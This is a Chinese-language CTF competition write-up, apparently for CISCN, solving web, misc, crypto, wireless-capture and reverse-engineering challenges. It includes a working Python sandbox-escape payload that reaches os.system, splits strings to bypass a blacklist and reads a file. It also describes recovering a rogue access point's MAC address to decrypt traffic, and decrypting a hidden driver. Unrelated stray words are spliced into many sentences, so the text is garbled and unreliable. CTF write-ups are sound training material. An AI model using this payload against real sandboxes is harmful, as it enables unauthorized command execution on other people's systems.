Web
easyweb
預期解:JWT偽造cookie八匠,詳見 http://www.reibang.com/p/e64d96b4a54d
非預期解:空密碼登陸
Misc
驗證碼
簽到題趋急,token登陸進去驳阎,輸個驗證碼就有flag
picture
binwalk –e task_ctf_01_KI2FmdE
得到文件97E4
Base64 –d 得到 1
修改頭部為zip頭,即為PK剧蹂,并重命名為flag.zip
解壓需要密碼
結(jié)合python報錯
得到解壓密碼
integer division or modulo by zero
成功解壓得到code
uuencode解碼得到flag
run
學習了多篇paper,最終payload為
print ().__class__.__bases__[0].__subclasses__()[59].__init__.__getattribute__('func_global'+'s')['linecache'].__dict__['o'+'s'].__dict__['sy'+'stem']('ca'+'t'+' /home/ctf/5c72a1d444cf3121a5d25f2db4147ebb')
解釋一下
這里主要是調(diào)用魔法函數(shù)
__dict__使得os和system能繞過黑名單,再調(diào)用魔方函數(shù)__getattribute__來傳入對象的方法func_globals城侧,也是能傳入字符串,從而能通過拆解字符串來繞過黑名單ls彼妻,最后達到命令執(zhí)行的效果
尋找入侵者
使用Omnipeek打開attack.pcapng可以看到有多個AP使用同樣的ESSID
CyberPeace
已知握手包密碼是攻擊者的網(wǎng)卡地址嫌佑,釣魚熱點一般都是開放式網(wǎng)絡(luò)沒加密,上圖可以看出88:25:93:c1:c8:eb這個沒有加密侨歉,很可能就是攻擊者的MAC地址歧强。假設(shè)有很多MAC地址的情況下當然也可以使用aircrack-ng快速驗證下
沒幾個MAC地址的情況下可以逐一試下使用同樣的ESSID
CyberPeace下的MAC地址,使用Omnipeek解密为肮,試了下最有可能是攻擊者MAC地址的88:25:93:c1:c8:eb摊册,解密成功。
解密成功后颊艳,使用Omnipeek的事件功能瀏覽下發(fā)現(xiàn)
http://wiattack.net/yTRFwRVi7z/key.rar
下載解壓發(fā)現(xiàn)key.pcap文件,使用Omnipeek雙擊打開既然提示打不開茅特,使用wireshark正常打開后,根據(jù)題目提到攻擊者向無線路由器發(fā)送了重連請求棋枕,使用wlan.sa == 88:25:93:c1:c8:eb顯示過濾后發(fā)現(xiàn)攻擊者MAC 88:25:93:c1:c8:eb有一個請求是發(fā)給AP ESSID為 CyberPeace 下的38:37:8b:9b:29:3c白修,提交flag
CISCN{Z9DY20jZIyjzY5vs0UQZVUg86eMYlNMzH}
Crypto
flag_in_your_hand
查看js關(guān)鍵代碼,這里如要是要讓ic的值為true
通過調(diào)試js的方法重斑,定位到關(guān)鍵代碼
寫出逆向的算法兵睛,得到傳入token的值,也就是s的值
輸入token的值得到flag
Re
我隊re大佬做題不喜歡截圖窥浪,wp只寫txt祖很,請多多包含哈,做題中的相關(guān)文件在附件re.7z里
2EX
僅變表base64, 字符表變?yōu)?@,.1fgvw#`/2ehux$~"3dity%_;4cjsz^+{5bkrA&=}6alqB*-[70mpC()]89noD".
解密"-+_Cl5;vgq_pdme7#7eC0="得"flag{change53233}"
RE
輸入格式 CISCN{xxx_xxx_xxx} 總長32
第一段
計算第一段輸入的MD5, 將hex文本中的A-F字母加上(index%10), 與9F925J9341B490FKJ3J4C4ED3G0J1NF2比較.
9F925J9341B490FKJ3J4C4ED3G0J1NF2 解密得 9E925E9341B490BFD3B4C4ED3B0C1EF2, 搜索引擎查到原文"this".第二段
計算第二段輸入的MD5, 與F21D98BCCC71A1391F1F11C5917CA270逐字節(jié)異或再轉(zhuǎn)hex文本, 其余同上.
9E925E9341B490BFD3B4C4ED3B0C1EF2 與 F21D98BCCC71A1391F1F11C5917CA270 異或得 6C8FC62F8DC53186CCABD528AA70BC82, 查到原文"f1rs".第三段
校驗MD5無法查到. 先爆破使程序?qū)懗?flag"文件, 文件解密過程中第三段輸入第4,第5個字符參與解密, 計算magic1和magic2, 交替異或.
構(gòu)造magic12(CISCN{this_f1rs_0121v56789ABCDE})使文件某一塊全為00, 發(fā)現(xiàn)字符"KGHG". 一開始以為是PNG的數(shù)據(jù)塊, 對比未果, 后來發(fā)現(xiàn)是JPG的"JFIF".
使第三段輸入第4, 第5字符分別為'0','w', 再次讓程序?qū)懗鑫募? 得到正常jpg, 圖中文字即為第三段輸入.CISCN{this_f1rs_Zer0woRdThyes@T}
NdisBackDoor
取長度為64的輸入ROT13, 再轉(zhuǎn)換為8x8矩陣A.
矩陣A右乘矩陣
{
{ 0x2B, 0x16, 0x1E, 0x53, 0x35, 0x39, 0x20, 0x29 },
{ 0x35, 0x63, 0x0A, 0x28, 0x2C, 0x06, 0x32, 0x2A },
{ 0x55, 0x39, 0x14, 0x5F, 0x20, 0x19, 0x34, 0x21 },
{ 0x19, 0x0B, 0x5A, 0x09, 0x50, 0x34, 0x6F, 0x5C },
{ 0x16, 0x1A, 0x68, 0x63, 0x34, 0x4E, 0x16, 0x45 },
{ 0x4C, 0x53, 0x2F, 0x3F, 0x3F, 0x28, 0x69, 0x51 },
{ 0x39, 0x44, 0x12, 0x24, 0x0A, 0x4D, 0x55, 0x31 },
{ 0x49, 0x3B, 0x40, 0x3B, 0x43, 0x28, 0x21, 0x36 }
}
結(jié)果通過映射
{
{0x3F, 0x2C, 0x19, 0x06, 0x33, 0x20, 0x0D, 0x3A},
{0x27, 0x14, 0x01, 0x2E, 0x1B, 0x08, 0x35, 0x22},
{0x0F, 0x3C, 0x29, 0x16, 0x03, 0x30, 0x1D, 0x0A},
{0x37, 0x24, 0x11, 0x3E, 0x2B, 0x18, 0x05, 0x32},
{0x1F, 0x0C, 0x39, 0x26, 0x13, 0x00, 0x2D, 0x1A},
{0x07, 0x34, 0x21, 0x0E, 0x3B, 0x28, 0x15, 0x02},
{0x2F, 0x1C, 0x09, 0x36, 0x23, 0x10, 0x3D, 0x2A},
{0x17, 0x04, 0x31, 0x1E, 0x0B, 0x38, 0x25, 0x12}
}
與
{
{ 0x8F66, 0x6B73, 0xCCCE, 0xA78C, 0xA45E, 0x9A31, 0x7B3C, 0x8C50 },
{ 0x6D67, 0x7B2A, 0x7E22, 0xAF05, 0xB447, 0x7EDD, 0xAEF0, 0x72A4 },
{ 0x7900, 0x9146, 0xA243, 0xA3BC, 0x8087, 0xC855, 0x884F, 0x7BD6 },
{ 0x9134, 0x76C5, 0xB260, 0x945D, 0x9328, 0x915A, 0x9031, 0x8D5B },
{ 0x62E7, 0xB1C2, 0x7B0E, 0x9864, 0xAE2F, 0xA110, 0xA69B, 0x535C },
{ 0xA7FF, 0x8778, 0x9348, 0xAF07, 0x88DF, 0x9854, 0x65FA, 0x5E64 },
{ 0x6D09, 0x8B86, 0xC3C3, 0x8BF8, 0xCCE3, 0x8427, 0x847D, 0x712F },
{ 0x8B48, 0x8723, 0x7E8F, 0xE2FC, 0x9170, 0x939A, 0x8F78, 0x64A4 }
}
進行比較.
映射前矩陣應為
{
{ 0xA110, 0x7E22, 0x5E64, 0x8087, 0x8723, 0x9031, 0xA78C, 0xA7FF },
{ 0x7EDD, 0xC3C3, 0x7BD6, 0x9170, 0xB1C2, 0x7B3C, 0xAF07, 0x7900 },
{ 0x8427, 0xB260, 0x64A4, 0xAE2F, 0x7B2A, 0x65FA, 0xA3BC, 0x8B48 },
{ 0x915A, 0xCCCE, 0x535C, 0xB447, 0x8B86, 0x884F, 0xE2FC, 0x62E7 },
{ 0x9A31, 0x9348, 0x72A4, 0xCCE3, 0x76C5, 0x8F78, 0x9864, 0x6D67 },
{ 0x9854, 0xA243, 0x712F, 0x9328, 0x6B73, 0xA69B, 0xAF05, 0x6D09 },
{ 0xC855, 0x7E8F, 0x8D5B, 0xA45E, 0x8778, 0xAEF0, 0x8BF8, 0x9134 },
{ 0x939A, 0x7B0E, 0x8C50, 0x88DF, 0x9146, 0x847D, 0x945D, 0x8F66 }
}解出矩陣A
83 49 110 84 123 71 121 45
49 114 45 68 104 118 114 103
114 101 45 108 48 104 45 111
114 112 98 122 114 32 71 49
45 121 114 45 122 66 101 114
45 108 66 104 45 78 101 114
45 110 111 86 114 45 71 98
45 49 45 49 114 110 101 125
轉(zhuǎn)換為字符得"S1nT{Gy-1r-Dhvrgre-l0h-orpbzr G1-yr-zBer-lBh-Ner-noVr-Gb-1-1rne}"
ROT13得"F1aG{Tl-1e-Quieter-y0u-become T1-le-mOre-yOu-Are-abIe-To-1-1ear}"
tryme
從主程序提取shellcode, 從shellcode提取dll. dll清花指令(74127510)和Exception Directory后IDA正常分析.
dll寫出驅(qū)動文件sys1, 用Read/WriteFile與sys1通信. WriteFile通信以寫入長度區(qū)分功能.
MajorFunction[IRP_MJ_WRITE]對應函數(shù)DispatchWrite. 長度為0x10時傳入進程ID與輸入與解密前的base64表的指針. 長度大于0x10時(1E00)傳入sys2文件. 長度為1時加載sys2并調(diào)用sys2中的驗證函數(shù).Hook WriteFile得到解密前的sys2, 解密過程在sys1中, 50字節(jié)循環(huán)異或. PE頭2字節(jié)必為4D5A, 與文件內(nèi)頭2字節(jié)CE4B異或得8311, 知50字節(jié)key以8311開頭. PE文件有FileAlign, 存在長度不定的00填充字節(jié), 從文件尾部提取key"83119F2DBB49D765F3810F9D2BB947D563F17F0D9B29B745D361EF7D0B9927B543D15FED7B099725B341CF5DEB79079523B1"解密sys2.
sys1內(nèi)存加載sys2, 以PID和輸入指針為參數(shù)調(diào)用DriverEntry. 解密base64表并加密輸入, 與"7E6LyN6SyK6L7EpfyH5g6iGLJKRh7rvi6K1g6f5l7r1="比較.
base64表解密后為"vwxrstuopq34567ABCDEFGHIJyz012PQRSTKLMNOZabcdUVWXYefghijklmn89+/", 解base64得"93dfcaf3d923ec47edb8580667473987"
